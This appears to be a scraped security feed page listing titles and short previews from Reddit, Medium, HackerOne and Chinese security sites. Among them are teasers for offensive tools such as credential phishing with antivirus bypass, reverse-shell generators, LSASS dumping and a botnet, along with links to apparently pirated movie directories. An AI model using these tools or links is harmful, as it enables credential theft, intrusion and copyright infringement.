    Our wildcard cert is up for renewal in a couple of months, and I'm wondering if it is more secure to provision individual certificates for each of our services. I believe the wildcard was supplied by our old MSP out of laziness, but if a wildcard is suitable we will stick with that. We currently use the certificate for 3 external-facing services, and some internal-facing which will likely be replaced with certs from our internal CA instead. submitted by /u/brettfk [link] [comments]
    Does anybody have [ALL] free threat intelligence source list?
    Hi All, I know Crowdstrike is a good choice but too expensive. I need your threat intelligence sources from your bookmarks (of course not all bookmark list :)) Any help would be appreciated! submitted by /u/110615 [link] [comments]
  • Open

    NCIIPC — How I am able to find sensitive information in .gov.in by using google dorks
    In this blog, I am going to show you how a low severity vulnerability can be affected by critical information disclosure to the citizens. Continue reading on Medium »
    Clickjacking Vulnerability
    What is clickjacking Continue reading on Medium »
    Getting better at bug bounty / hacking
    Whilst this article isn’t going to contain any real golden nuggets around bug bounties or hacking, I thought I would take the time to talk… Continue reading on Medium »
    Step 20: Cross-Site Scripting (XSS)
    Back to HTB: Academy… I’m determined to finish this Bug Bounty Cert! Continue reading on Medium »
    Server Side Request Forgery (SSRF) Attacks
    Server-side request forgery (SSRF) attacks exploit software vulnerabilities that could allow an attacker to trick the server-side… Continue reading on Medium »
  • Open

    Write-up: JWT authentication bypass via flawed signature verification @ PortSwigger Academy
    No content preview
    Redline Stealer Malware Static Analysis
    No content preview
    Confidential — TryHackMe Walkthrough
    No content preview
    Hackers use String of Emojis to hack you.
    No content preview
    BrainStrom TryHackme
    No content preview
    Linux fundamentals — Summary:
    No content preview
  • Open

    Write-up: JWT authentication bypass via flawed signature verification @ PortSwigger Academy
    No content preview
    Redline Stealer Malware Static Analysis
    No content preview
    Confidential — TryHackMe Walkthrough
    No content preview
    Hackers use String of Emojis to hack you.
    No content preview
    BrainStrom TryHackme
    No content preview
    Linux fundamentals — Summary:
    No content preview
  • Open

    Write-up: JWT authentication bypass via flawed signature verification @ PortSwigger Academy
    No content preview
    Redline Stealer Malware Static Analysis
    No content preview
    Confidential — TryHackMe Walkthrough
    No content preview
    Hackers use String of Emojis to hack you.
    No content preview
    BrainStrom TryHackme
    No content preview
    Linux fundamentals — Summary:
    No content preview
  • Open

    Disney Movies (+ a couple Alien Movies)
    http://173.249.48.243/movies2/ submitted by /u/NELS8672 [link] [comments]
    Directory with movies and series from 1931 - 2020
    https://dl3.3rver.org/cdn2/04/ EDIT: It has subtitles too in the HEX directories. https://dl3.3rver.org/ submitted by /u/Wrangler-Left [link] [comments]
    a smattering of NSFW content with some anime thrown in?
    http://195.154.165.20/TDownloads/?C=M;O=D I checked if this was a duplicate and nothing came up - feel free to delete if it is (still kinda new to finding them on my own) submitted by /u/LucasImages [link] [comments]
    faster?
    http://data.lrisp.net/disk6/English%20Movies/2022/ submitted by /u/Hyp3rionX [link] [comments]
    MIDIs
    https://sprott.physics.wisc.edu/midi/ http://eddiejackson.net/piano/midi/ https://bhs.minor9.com/midi/ https://www.apprendrelaguitare.ca/midi-interpretes/ http://cd.textfiles.com/midifiles/ submitted by /u/ilikemacsalot [link] [comments]
    Nice little collection
    browse around https://files.beast.ruun.network/Movies/ submitted by /u/Hyp3rionX [link] [comments]
    Couple movies in french
    http://www.lemaurecourtois.com/film/ submitted by /u/Hyp3rionX [link] [comments]
  • Open

    SecWiki News 2022-08-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-21 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Replicant: Reproducing a Fault Injection Attack on the Trezor One
    submitted by /u/wrongbaud [link] [comments]
    Backdoor specially made for hardened networks which leverages NTP
    submitted by /u/Idov31 [link] [comments]
    FreeBSD 11.0-13.0 LPE via aio_aqueue Kernel Refcount Bug
    submitted by /u/rwgd406 [link] [comments]
  • Open

    Blind SSRF External Interaction on https://mtngbissau.com/
    MTN Group disclosed a bug submitted by error201: https://hackerone.com/reports/1220688

  • Open

    CredPhish — Captura Usuários e Senhas
    O CredPhish realiza a captura de usuários e senhas e utiliza mecanismos que visam bypassar as camadas de proteção dos Antivírus. Continue reading on 100security »
    Chimera — Reverse Shell
    Chimera é uma ferramenta desenvolvida em Shell Script que gera payloads capaz de realizar o bypass no Windows Defender e em outros… Continue reading on 100security »
    Hackthebox[timelapse]
    Running an Nmap stealth scan against top 1000 ports returns several ports open including 53, 88, 135, 139, 389, 445, 464, 593, and 636: Continue reading on Medium »
  • Open

    Always finish with a sweet Bug
    Hello, friends today I will tell you how I was able to find a critical vulnerability during an internal assessment. Continue reading on Medium »
    Failed Coding Assessment to Remote Code Execution - Part 1
    Security is mostly a superstition. It does not exist in nature. Continue reading on Medium »
    How I hacked my first Twitter web challenge
    It was Saturday morning when I checked Twitter on my phone and saw the following tweet… Continue reading on Medium »
    Cybersecurity Attack and Defense Strategies eBook
    Cybersecurity — Attack and Defense Strategies, Third Edition: Improve your security posture to mitigate risks and prevent attackers from… Continue reading on Medium »
    Cross site request forgery (CSRF) attack
    What is CSRF Continue reading on System Weakness »
    IW Weekly #18: $45,000 Facebook Bug Bounty, Cross-site Scripting, Hacking, Recon and Breaking into…
    Hey 👋 Continue reading on Medium »
    How to get started with bug bounty programs: tips for businesses of all sizes
    Introduction Continue reading on Medium »
    Automate Bug Bounty: Guide to Nuclei Tool
    What’s up awesome people, do you want to automate the whole bug hunting process? Continue reading on Medium »
  • Open

    UK Security Clearance (SC) for dual citizen . Got some questions
    I am a dual UK/Canadian citizen with full British passport since birth. I’ve lived in the UK for 3 years and 3 months. Will I be eligible? submitted by /u/Informal-Pear-5272 [link] [comments]
    burp scanner pro
    burp scanner (pro) Hey guys. I'm a new appsec engineer and am wondering if any other appsec engineers or pen testers can shed some light on this part of the tool. Do you actually use the passive and active scanners for crawl and audit? If so what scan parameters normally yield the best results. I generally conduct security assessments manually but I'm sure there's things I miss because I can't catch everything with my eyes. Also being an appsec engineer means it's super hard to be the expert in security and devops and software best practices etc. Cheers submitted by /u/hootus_nootus [link] [comments]
  • Open

    How to cover the identity of an unknown Email Address: OSINT
    When encountering an unknown Email address it may seem like a dauting task to reveal the identity/owner of said email but in reality it… Continue reading on Medium »
    The “hidden” side of WordPress websites
    Some time ago there was a pretty popular song, but for this publication I will change it’s title a bit… “What does the WordPress say” Continue reading on Medium »
  • Open

    CVE-2022-38392 Rhythm Nation Exploit
    Article URL: https://exploit.report/cve/cve-2022-38392/ Comments URL: https://news.ycombinator.com/item?id=32534626 Points: 3 # Comments: 0
  • Open

    Since Rust eliminates the dangers of C/C++, will there be no more attacks of memory corruption and binary exploitation ?
    I wanted to devote myself to this side of cybersecurity but with Rust there shouldn't be more people dealing with this, right? submitted by /u/Remarkable-Emu-6453 [link] [comments]
  • Open

    IW Weekly #18: $45,000 Facebook Bug Bounty, Cross-site Scripting, Hacking, Recon and Breaking into…
    No content preview
  • Open

    IW Weekly #18: $45,000 Facebook Bug Bounty, Cross-site Scripting, Hacking, Recon and Breaking into…
    No content preview
  • Open

    IW Weekly #18: $45,000 Facebook Bug Bounty, Cross-site Scripting, Hacking, Recon and Breaking into…
    No content preview
  • Open

    SecWiki News 2022-08-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-20 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Ways to Dump LSASS
    Multiple different ways to dump hashes from LSASS https://crypt0ace.github.io/posts/Dumping-Lsass/ submitted by /u/Potential_Waltz7400 [link] [comments]
  • Open

    1000+ Alive Proxy Servers Ranked, Maintained via automation (API available)
    Proxy List: https://oproxy.ml/ How to use a proxy: https://youtu.be/7sGhrGsd_HU Residential proxies are marked as private. submitted by /u/MidhunVNadh [link] [comments]
    2021 and 22 movies
    http://213.58.179.90/media/store/ submitted by /u/RainyAbrar [link] [comments]
  • Open

    RPC call crashes node
    Monero disclosed a bug submitted by xfang: https://hackerone.com/reports/1379707
  • Open

    Compare with a base image
    Is there a way to compare a image with a golden/base with Axiom or Autopsy? I tried google but didn't find anything. Thanks! submitted by /u/DeadBirdRugby [link] [comments]

  • Open

    What is the safest way to research on sites with potential threats?
    After fixing the backup solution for our office I had some thoughts about the safest way to surf and download on the internet with minimal effort. I came to the following options and wanted to ask if Option E is really the best of the ones listed and if there is even a safer way? ​ Option A: Surf normally Shortcomings: Fully exposed, Virus threat ​ Option B: Surf with SSL Connection Shortcomings: Site visits still visible, IP tracking trough ISP, Virus vulnerability ​ Option C: Surf with SSL Connection + VPN installed on PC Shortcomings: VPN disconnects could still leak IP, Virus vulnerability ​ Option D: SSL + VPN + Surf on Sites with potential threats only within VirtualBox Shortcomings: still possible IP leaks ​ Option E: Have a second router which runs a VPN - have that router connected to a special laptop only for that router (not connected to company server/NAS) - Laptop has a second VPN running, risky sites still in virtualbox Shortcomings: ? submitted by /u/Feltos [link] [comments]
    How do we feel about redact.dev?
    https://redact.dev/ submitted by /u/Shelter4277 [link] [comments]
    Weird email from Apple but seems legit.
    Hello, I'm not sure if this is the right subreddit to post this question but here it is., sorry for the long post. Preface: My current phone is a Galaxy A52 that last year replaced an old iPhone 6s that since then is sitting in its original box on a shelf in my office. Also the Apple ID used on that phone was different, and before retiring it I logged off from Apple ID, iMessage etc.., shut the phone off and forget about him. Last night I received a notification email from Apple saying that my Apple ID was used to sign in to iMessage on an iPhone 6s. The email seems legit and not a phishing attempt, the sender email ["noreply@email.apple.com](mailto:"noreply@email.apple.com)" is a legit Apple Domain. Also the Apple ID URL linked in the email as well as the links in the email footer ar…
    SAST opinions
    What SAST options do yall recommend? Primary languages C#/Ruby integrating with github, visual studio. Mend looks nice but a bit expensive. I've heard fortify and veracode were meh but potentially cheaper. submitted by /u/AnyProgressIsGood [link] [comments]
    What is the best open source honeypot? [Need Experiences]
    Hi All, Hope you are fine. I am creating home lab and planning set up several honeypots in several countries but first i will install in my VM and if i achieve i will set up that honeypot to other servers. P.S.: I am looking for All-inOne honeypot. Not just SSH or Credential Honeypot. I need your experiences and help about this issue. Any help would be appreciated. Thanks in advance. submitted by /u/110615 [link] [comments]
    TPM (Trusted Platform Module) vs. TEE (Trusted Execution Environment) - can credentials be *stored* on both?
    Hi guys, TPM is physically isolated from the rest of the system (i.e. it is a standalone chip on the mainboard), while TEE is a secure area of the main CPU. The key function of both TPM and TEE is to do cryptographic calculations, but can they also store credentials/keys used in these calculations? I know SE (Secure Element - also a standalone chip) is used exactly for storage purposes, but only 30% of modern smartphones have SE integrated (and mostly expensive models). So how is the credential storage task solved in TPM/TEE scenarios? ​ Thank you! submitted by /u/LSDwarf [link] [comments]
    gdpr compliant vpn / proxy / relay detection
    Hi I'm looking for a detection service like vpnapi.io or ipqualityscore.com which is located in the GDPR region. The two mentioned services are great but I simply don't know where they are located at. And the don't mention any GDPR policies. Root cause: IP addresses are PII in GDPR and as such should not be sent to the USA and other countries considered as non-compliant... Appreciate any help, thanks! submitted by /u/winschdi [link] [comments]
  • Open

    Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More
    Recent exploits observed in the wild are highlighted based on the availability of proofs of concept, the severity of the vulnerabilities the exploits are based on and the ease of exploitation. The post Network Security Trends: Recent Exploits Observed in the Wild Include Remote Code Execution, Cross-Site Scripting and More appeared first on Unit 42.
  • Open

    Russian Government Control and Propaganda in the age of Social Media: “Life.ru”
    VK is a gargantuan social media platform, largely overlooked by the western world. According to this statistic by Statista, it was the… Continue reading on Medium »
    Ethereum (ETH) OSINT investigations tools
    Ethereum (ETH) is the second most popular cryptocurrency in the world, as well as a platform for creating decentralized online services… Continue reading on Medium »
    Bitcoin (BTC) OSINT investigations tools
    Bitcoin (BTC) is a peer-to-peer payment system that uses the unit of the same name to record transactions. It is the world’s first… Continue reading on Medium »
  • Open

    The 160 Hours Bug Bounty Hunting Challenge — Bug Hacking
    Bug bounty is one of the hot topics nowadays. If you are actively following cybersecurity people on social networks (especially Twitter)… Continue reading on Medium »
    How I hacked my University Servers
    Fri Aug 5 around 1:00 a.m. was surfing the internet and like every other day i logged on my uni portal to check my attendance and if any… Continue reading on Medium »
    My own methodology to find XSS vulnerability
    Before everything I have to say this article and this methodology is my own methodology and people do not necessary follow this way… Continue reading on Medium »
    Account takeover worth $1000
    How I was able to find account takeover bug in one of the biggest organization in the world Continue reading on Medium »
    My Bug Bounty Resources
    author : — SATYAMP Continue reading on Medium »
    New Bug Bounty Vault on Hats: Welcome Mover!
    With great excitement we welcome another project to Hats Finance. Through our decentralized bug bounty platform, we onboard Mover to… Continue reading on Medium »
    Bypassing CSP
    CSP stands for Content Security Policy. This is a response header that identifies what is authorised to load scripts, HTML elements and… Continue reading on Medium »
    Introduction to the MITRE ATT&CK Framework
    What is the MITRE ATT&CK Framework? Continue reading on Medium »
  • Open

    Walkthrough: Shared — HackTheBox
    In this article, I will tell you about my walkthrough the Shared challenge from HackTheBox. Cause this is my first time making walkthrough… Continue reading on Medium »
  • Open

    Bighuge BLS OSINT Tool - BBOT
    submitted by /u/aconite33 [link] [comments]
    GraphQL Security Testing Without a Schema
    submitted by /u/alxjsn [link] [comments]
    Pitraix Botnet - Modern P2P Self-Modifying Botnet Cross-Platform Over TOR
    submitted by /u/United-General-2000 [link] [comments]
    iOS Privacy: TikTok monitoring all keyboard inputs and taps
    submitted by /u/CyberMasterV [link] [comments]
    A Lightweight Approach To Implement Secure Software Development LifeCycle (Secure SDLC)
    submitted by /u/sanitybit [link] [comments]
    Zero Day Initiative — But You Told Me You Were Safe: Attacking the Mozilla Firefox Renderer (Part 1)
    submitted by /u/sanitybit [link] [comments]
    Oh SSH-it, what's my fingerprint? A Large-Scale Analysis of SSH Host Key Fingerprint Verification Records in the DNS
    submitted by /u/sanitybit [link] [comments]
  • Open

    Write-up: Git Happens @ TryHackMe
    No content preview
    Erlik — Vulnerable SOAP Service
    No content preview
    C Language for Hackers & Beyond! 0x02
    No content preview
  • Open

    Write-up: Git Happens @ TryHackMe
    No content preview
    Erlik — Vulnerable SOAP Service
    No content preview
    C Language for Hackers & Beyond! 0x02
    No content preview
  • Open

    Write-up: Git Happens @ TryHackMe
    No content preview
    Erlik — Vulnerable SOAP Service
    No content preview
    C Language for Hackers & Beyond! 0x02
    No content preview
  • Open

    Looking for a solution for Enterprise Mobile forensics
    Our need is to be able to remotely and stealthily pull a filelist and directory structure from Enterprise managed mobile devices. specifically the download folder and other folders used by chat apps for downloads. To be able remotely and stealthily collect specific files would be a bonus. Anyone aware of such a solution in the market? submitted by /u/vacathrowaway789 [link] [comments]
    Best Practice to avoid bitlocker.
    This is kind of a general question but for imaging a what is the best way to Avoid bitlocker when pulling out a hard drive or SSD. is it smarter to remove the battery and then pull the drive? I have read that pulling the battery can potently mess with the BIOS settings which will trip bitlocker. or is it smarter to leave the battery plugged in and then pull the drive? does this change with SSD? I don't want to avoid bitlocker but then kill the drive. I know i could log in and then pull the bitlocker key but that overwrites artifacts and then I would need the custodian credentials and then admin credentials which we sometimes don't get prefer to do a dead image. any help would be appreciated. Thank you. submitted by /u/dougman2082 [link] [comments]
    Junior advice
    Hi everyone, I am a junior IT with systems background and a bit of VAPT, in the company I was asked which field of interest I wanted to develop my knowledge and I put Digital Forensics. At the moment there is no one who takes care of this thing being a small company but it is not a problem for me, it would still be a side activity to my normal job that I want to explore. The company did not give me a budget on tools and courses but asked me to evaluate what I would need and then we will evaluate together but they have already told me that there are no economic difficulties. ​ In the wiki I read something but I would like to ask you in practice which courses should I start with and which enterprise tools to use because I have already fiddled with dd, autopsy, ftk, EZTools, adb, volatility and the other hundreds of tools but having the opportunity to spend I imagine there are also more complete solutions, especially as regards the acquisition (server, client, mobile), because trying to explore by myself I understood how many things work but the analysis is sometimes slowed down by the amount of data and the more delicate acquisition if real evidence were to be collected for a case. I've seen Cellbrite UFED, Belkasoft X Forensics, and Oxygen Forensics Detective which seem the most professional to me, but which one to choose? Are there any other proposals? ​ For the courses issue, I will start reading some wiki books but for courses or certifications I am completely lost, I accept any suggestion. ​ Thanks everyone in advance! submitted by /u/ddUnicorn [link] [comments]
  • Open

    SecWiki News 2022-08-19 Review
    数字取证与事件响应(DFIR)优质资源推荐 by ourren 以色列国家网络安全防御体系建设及启示 by ourren 论如何优雅的注入Java Agent内存马 by ourren 细谈新版企业风险评估模型 by ourren Tailmon-EDR: 开源主机安全卫士 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-19 Review
    数字取证与事件响应(DFIR)优质资源推荐 by ourren 以色列国家网络安全防御体系建设及启示 by ourren 论如何优雅的注入Java Agent内存马 by ourren 细谈新版企业风险评估模型 by ourren Tailmon-EDR: 开源主机安全卫士 by ourren 更多最新文章,请访问SecWiki
  • Open

    Good reporting tool for team to use that is compatible with nessus?
    Currently we use Dradis and it works... but it could be a whole lot better. We are trying a lot of demos at the moment. We've tried attack forge and a couple others. Does anyone have any recommendations? submitted by /u/Ziggy__Pop [link] [comments]
  • Open

    Song from 1989 declared a cybersecurity vulnerability for crashing hard drives
    Article URL: https://www.techspot.com/news/95671-janet-jackson-song-1989-declared-cybersecurity-vulnerability-crashing.html Comments URL: https://news.ycombinator.com/item?id=32521408 Points: 3 # Comments: 0
  • Open

    ​五大不良 coding 习惯,你占了几样?
    通过提高对不良编码习惯(Bad Coding Habits)的认知,企业可以开始主动关注代码的完整性。
    谨防数据泄露!“即刻PDF阅读器”内置后门收集用户隐私
    近期,火绒安全团队发现“即刻PDF阅读器”内置后门程序,该后门程序会在用户不知情的情况下,会肆意收集用户的各种隐私数据如:谷歌、百度、淘宝、京东、天猫等网站的搜索内容、电商购物记录、系统进程信息、等。
    揭露APT组织穆伦鲨(MurenShark), 瞄向土潜艇科研人员
    经过分析,研究人员确认本轮攻击活动来自一个由伏影实验室于21年4月确认的新型威胁实体Actor210426。
    FreeBuf周报 | Gartner发布2022年新兴技术成熟度曲线;两款红米手机存在安全漏洞;Instagram跟踪用户网络活动
    本周「FreeBuf周报」,我们总结推荐了本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    为什么传统的验证码不再安全
    20年多前发明的“字符验证码”不能顺应时代发展的潮流必将遇到重重困难,安全性也便不言而喻。
    “阎罗王”勒索再现!思科中招过程披露
    在此次事件中,阎罗王勒索团伙劫持了一名员工的个人谷歌账户,其中包含从其谷歌浏览器同步的凭证,之后利用该员工的凭证进入了思科网络。
  • Open

    论如何优雅的注入 Java Agent 内存马
    作者: rebeyond 原文链接:https://mp.weixin.qq.com/s/xxaOsJdRE5OoRkMLkIj3Lg 回顾 2018年,《利用“进程注入”实现无文件复活 WebShell》一文首次提出memShell(内存马)概念,利用Java Agent技术向JVM内存中植入webshell,并在github上发布memShell项目。项目中对内存马的植入过程比较繁琐,需...
  • Open

    论如何优雅的注入 Java Agent 内存马
    作者: rebeyond 原文链接:https://mp.weixin.qq.com/s/xxaOsJdRE5OoRkMLkIj3Lg 回顾 2018年,《利用“进程注入”实现无文件复活 WebShell》一文首次提出memShell(内存马)概念,利用Java Agent技术向JVM内存中植入webshell,并在github上发布memShell项目。项目中对内存马的植入过程比较繁琐,需...
  • Open

    Stored XSS on TikTok Ads
    TikTok disclosed a bug submitted by sinayeganeh: https://hackerone.com/reports/1504202 - Bounty: $2500

  • Open

    Zararlı yazılım analizi (basit düzey) ve kullanışlı araçlar
    Zararlıyı analiz etmek için önce zararlıya ihtiyaç duyduğumuzdan msfvenom ile basit bir elf executable oluşturuyoruz: Continue reading on Medium »
  • Open

    rocket science papers
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    medieval and renaissance art
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    a russian OD (not a bad one).
    this is the URL -> http://109.200.155.175/%D0%A4%D0%B8%D0%BB%D1%8C%D0%BC%D1%8B/ it is NOT obfuscated - it's just all directory names are in cyrylic, and browser translates them to per-cent codes. as for the content it's a kind of mixed bag. i'd say it's 50/50 good quality stuff (high bit-rate) and SD stuff. first difficulty is that all folder names are in Russian - and for some reason Google Translate didn't want to touch it (dunno why?) another one is, that all the movies are muxed, and default audio track is in Russian - hence it's all to be remuxed again. fortunately i found only 3 (i think) titles that were without original audio track, so it's good to get. i'm talking MKV files obviously... AVIs i didn't touch - not interested in SD stuff :P there is also some music there (this is how i found it). happy leeching :D submitted by /u/paprok [link] [comments]
  • Open

    Process of solving a Quiztime #SundayQuiz challenge
    Solving Quiztime challenges is always fun as this is a event which kills a lot of time which is suitable for me as I am very free in the… Continue reading on Medium »
    What is the Potential Impact of too Much Personal Identifiable Information?
    The wealth of Personal Identifiable Information (PII) which can be gathered on an individual from the internet is growing exponentially… Continue reading on Medium »
    What is the Potential Impact of too Much Personal Identifiable Information?
    The wealth of Personal Identifiable Information (PII) which can be gathered on an individual from the internet is growing exponentially… Continue reading on Medium »
  • Open

    Delimiter injection in GitHub Actions core.exportVariable
    GitHub disclosed a bug submitted by jupenur: https://hackerone.com/reports/1625652 - Bounty: $4617
  • Open

    The 10th Anniversary Edition - Cobalt Strike Research and Development
    submitted by /u/billymeter [link] [comments]
    Hardware-based threat defense against increasingly complex cryptojackers
    submitted by /u/SCI_Rusher [link] [comments]
    Guide to DLL SideLoading
    Hey! Here's a small blog I wrote that shows how we can use DLL Sideloading. Let me know what you guys think. https://crypt0ace.github.io/posts/DLL-Sideloading/ submitted by /u/Potential_Waltz7400 [link] [comments]
  • Open

    Multiple Vulnerabilites Discovered in RPA Vendor Blue Prism.
    submitted by /u/jat0369 [link] [comments]
    Hardware-based threat defense against increasingly complex cryptojackers
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    Box Drive Forensics
    Hi. I work with a lot of companies that use Box Drive for online file storage. I use KAPE to collect Box Metadata files from the users computer so I have a lot of files to analyze in order to figure out what was happening. What tools are everyone using for Box Drive forensics? submitted by /u/antmar9041 [link] [comments]
  • Open

    Vulnerability in open source identity management system Free IPA could lead to
    Article URL: https://portswigger.net/daily-swig/vulnerability-in-open-source-identity-management-system-free-ipa-could-lead-to-xxe-attacks Comments URL: https://news.ycombinator.com/item?id=32511814 Points: 2 # Comments: 0
    Janet Jackson music video declared a cybersecurity vulnerability
    Article URL: https://www.theregister.com/2022/08/18/janet_jackson_video_crashes_laptops/ Comments URL: https://news.ycombinator.com/item?id=32506400 Points: 16 # Comments: 1
  • Open

    SecWiki News 2022-08-18 Review
    基于海量样本数据的高级威胁发现 by ourren 关键信息基础设施安全保护三大关键能力 by ourren 金融行业能力安全运营能力成熟度模型(FCSO-CMM) by ourren How Hash-Based Safe Browsing Works in Google Chrome by ourren 演化的大安全体系框架 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-08-18 Review
    基于海量样本数据的高级威胁发现 by ourren 关键信息基础设施安全保护三大关键能力 by ourren 金融行业能力安全运营能力成熟度模型(FCSO-CMM) by ourren How Hash-Based Safe Browsing Works in Google Chrome by ourren 演化的大安全体系框架 by ourren 更多最新文章,请访问SecWiki
  • Open

    CVE-2022-38392 Details
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-38392 Comments URL: https://news.ycombinator.com/item?id=32508488 Points: 1 # Comments: 0
  • Open

    What to Log V2.0
    I asked this question yesterday but people suggested more info was necessary. That's a fair call, so I'm making a V2.0 of my question. This is for my side hustle on a domestic internet connection. My computers are, an Apple, a dual booting (Windows 10/Linux) PC and a really old PC running XP. Apart from these, I have 2 other computers which are for personal use only i.e. internet browsing and e-mail. Other than that, there are tablets and phones. The XP machine isn't connected to the network, but I wouldn't mind having it running on the network for file transfers between my main PC to that XP box. No idea whether this is a good idea or not given how old XP is. Everything is behind an ISP's router. Nothing will be accessible from outside my network. However everything has internet access except for the XP machine which is currently sitting unplugged as I mentioned previously. I plan on running a server on the Apple and a different one on Linux. I will be accessing the Apple server from two computers i.e. from the Apple and the dual boot PC i.e. from Linux and Windows 10. The Linux server will only be accessed from within Linux. I don't see a need to connect to it from anywhere other than from within Linux at least at this stage. So I would like to ensure nothing can hurt me from outside my network and if something stupid happens on my network, whether coming from my personal machines or my workstations, I would like to be able to do something about it i.e. identify and then remediate. The main point is to keep my data safe on my servers. At the moment, I'm setting up the PF firewall on the Apple device. But I want to set up a firewall on the Linux machine at some stage also. I will be logging everything to my HDDs on my Apple device and on the Linux install. I plan on reviewing the logs every so often to ensure everything is running hunky dory. So the question is, what stuff should I be logging? submitted by /u/Jastibute [link] [comments]
    Secure and Private ipaddress check tool?
    any suggestions? i use analti on my streaming devices. is that a trust worthy company for things other than streaming? submitted by /u/Shelter4277 [link] [comments]
    Should I use CAA Records?
    Hi AskNetSec, I'm a DevSecComplianceInfrastructureM365AWSCICDEngineer, I've recently found out about CAA records in DNS and I wanted to ask if I should use them? Would this prevent another CA issuing certificates against my domain, and should I be worried about this? submitted by /u/CyberStagist [link] [comments]
  • Open

    利用Splunk构建SOC-SOC建设漫谈及splunk的角色
    Splunk那么死贵,他的角色是怎样的,又是怎么和安全及SOC联系起来的,该如何利用它。
    FreeBuf早报 | 2021年,身份欺诈案例创下新记录;宝马遭挖墙脚,黑客光明正大敛钱
    微软的员工已暴露了公司在线基础设施的敏感登录凭据。
    BlackByte团伙携新勒索手段卷土重来
    勒索软件 BlackByte 带着 2.0 版本回归了,并创建了一个新的数据泄露网站
    聊聊新版风险评估的变化
    新版风评简化了要素关系,只保留了资产、脆弱性、威胁、安全措施和风险要素。
    Kage:针对Metasploit Meterpreter图形化用户接口
    KageKage可以帮助广大研究人员通过图形化的用户UI界面与Meterpreter会话进行交互,并生成Payload。
    如何使用SilentHound枚举活动目录域
    SilentHound是一款针对活动目录域安全的检测工具,该工具可以通过LDAP解析用户、管理员和组信息,并以此来在后台悄悄枚举活动目录域。
    攻击者开发BugDrop恶意软件,可绕过安卓安全防护
    随着BugDrop逐步完善当前存在的各种缺陷,攻击者在与安全团队、银行机构的战争中拥有一种全新的高威力的武器,可击败谷歌目前采用的解决方案。
    如何破局数据安全“破局难题” | FreeBuf甲方群话题讨论
    在上有法规约束,下有企业业务保障所需的双重驱动下,应该如何做好数据安全运营?
    PR-DNSd:功能强大的被动递归DNS守护程序
    PR-DNSd是一个功能强大的被动递归DNS守护程序,有多种适用场景。
    上海浦东发展银行信用卡中心招聘信息
    上海浦东发展银行信用卡中心成立于2004年1月,是国内最早获得金融许可证的信用卡中心之一。
    如何使用truffleHog敏感数据以保护代码库安全
    该工具可以通过深入分析目标Git库的提交历史和代码分支,来搜索出潜在的敏感信息。
    2021年,身份欺诈案例创下新记录
    谷歌语音诈骗在 2021 年的身份相关欺诈案例中创下新纪录。
    LAUREL:一款功能强大的Linux事件日志审计和转换工具
    可以帮助广大研究人员处理Linux系统事件日志,并对其进行后续处理,以便将日志应用到其他现代安全监控系统之中。
  • Open

    IW Weekly #17: $30,000 Bounty, Instagram Account Takeover, AWS Security Series, Google…
    No content preview
  • Open

    IW Weekly #17: $30,000 Bounty, Instagram Account Takeover, AWS Security Series, Google…
    No content preview
  • Open

    IW Weekly #17: $30,000 Bounty, Instagram Account Takeover, AWS Security Series, Google…
    No content preview
  • Open

    IW Weekly #17: $30,000 Bounty, Instagram Account Takeover, AWS Security Series, Google…
    Hey 👋 Continue reading on InfoSec Write-ups »
    Cybercriminals Developing this to Bypass Android Security Features
    In a sign that malicious actors continue to find ways to work around Google Play Store security protections, researchers have spotted a… Continue reading on Medium »
    N/a to $750 bounty for a Blind XSS.
    Without wasting any time, I try to keep everything to the point. Continue reading on Medium »

  • Open

    Livestream video for Developing POC for CVE-2022-26923
    Thanks to the participants, it was really fun even though a lot of mistakes were made haha. Full, uncut video is uploaded to my YouTube: https://youtu.be/z86tfhMU_vU submitted by /u/lsecqt [link] [comments]
  • Open

    How to create a bootable encrypted CD/DVD/USB?
    I have a custom Win10 image that was made in MDT. I need to figure out a way to encrypt the image while still having a bootable disc. The idea is that you insert the disc into the drive, boot the computer from the disc, are prompted for a password, and if the password is correct, the image on the disc is decrypted and installed. If anyone has any experience with this, I'd appreciate hearing your ideas. submitted by /u/blixel [link] [comments]
    Instagram set on private mode without following anyone but people instantly know what posts I like and comment on?
    Have always wondered how people do this? I've got an insta account that I use to follow and like certain content (not for following people I know irl) but somehow people who I know irl find out my activity on that account instantly? Eg if I like a certain post and comment on it, yet they don't follow me? Maybe there's something I'm missing... Any help is much appreciated. submitted by /u/sdman57 [link] [comments]
    Monitor usb
    Hello I am looking for software that monitors a usb. Right now i am looking at USB Monitor Pro but i am more interested in free alternatives. submitted by /u/ZFosint [link] [comments]
    What to Log
    Hi, I’m configuring a PF firewall. What packets should I log? submitted by /u/Jastibute [link] [comments]
    The Suricata is recording a lot of data and not enough space
    Hi there. Do you know any best practices for how I can reduce the log size? Suricata produced 150GB JSON logs per day. Well, I can't handle it in the large run. There is a possibility to switch from JSON to another type of log? Or maybe there are some not very informational rules that can be disabled? submitted by /u/athanielx [link] [comments]
    Intro book to IT & Security
    Hi there. I will give a class on cybersecurity to non engineers. Very likely they don't have any tech background. I need to recommend books/lectures that serve as an intro to IT, cloud, and maybe basic security concepts. Any recommendations? submitted by /u/Equivalent-Net-7496 [link] [comments]
  • Open

    Is everything about stack and heap overflows?
    submitted by /u/_RichardHendricks_ [link] [comments]
    How you find vulnerable version and patched version for bin diff?
    I work on a CVE, and I need vulnerable Dll and patched DLL. For this I need download vulnerable windows and so update for get patched version , or another solution for this problem. submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Introduction to web APIs
    This is post from my new blog in which I will be sharing notes about things I am learning. It will be centered around security/application… Continue reading on Medium »
    Welcome to Hats, Jelly Protocol
    We are happy to announce our bug bounty partnership with Jelly protocol! Continue reading on Medium »
    Step 19: SQLi (a la PortSwigger)
